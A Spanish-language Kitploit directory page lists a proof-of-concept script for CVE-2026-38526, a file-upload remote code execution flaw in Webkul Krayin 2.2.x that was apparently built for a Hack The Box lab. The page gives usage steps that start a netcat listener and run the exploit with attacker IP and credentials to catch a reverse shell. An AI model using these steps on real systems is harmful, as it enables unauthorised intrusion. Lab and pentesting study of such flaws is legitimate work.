Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-38526-PoC-htb-nexus — Un script PoC para CVE-2026-38526, RCE a través de una vulnerabilidad de carga de archivos en el endpoint /admin/tinymce/upload de webkul krayin 2.2.x | Kitploit
Herramientas/GitHubGitHub/resolvdd/cve-2026-38526-poc-htb-nexus
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubresolvdd/cve-2026-38526-poc-htb-nexus

CVE-2026-38526-PoC-htb-nexus

Un script PoC para CVE-2026-38526, RCE a través de una vulnerabilidad de carga de archivos en el endpoint /admin/tinymce/upload de webkul krayin 2.2.x

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-38526-PoC-htb-nexus

Un script PoC para CVE-2026-38526, RCE a través de una vulnerabilidad de carga de archivos en el endpoint /admin/tinymce/upload de webkul krayin 2.2.x (construido para htb-nexus)

🛠 Inicio rápido y uso

  1. Clonar el repositorio:
    root@kitploit:~
    git clone https://github.com/Resolvdd/CVE-2026-38526-PoC-htb-nexus.git
    cd CVE-2026-38526-PoC-htb-nexus
    
  2. Crear un entorno virtual de Python:
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    
  3. Instalar requirements.txt:
    root@kitploit:~
    pip install -r requirements.txt
    
  4. Iniciar el listener:
    root@kitploit:~
    nc -lvnp <port number> (Default: 9001)
    
  5. Ejecutar el script:
    root@kitploit:~
    python3 poc.py -i <your-ip> -p <listener-port-number> -e <valid-krayin-email> -P <valid-krayin-password> -u <url-excluding-protocol Default: http>
    
Descargar herramienta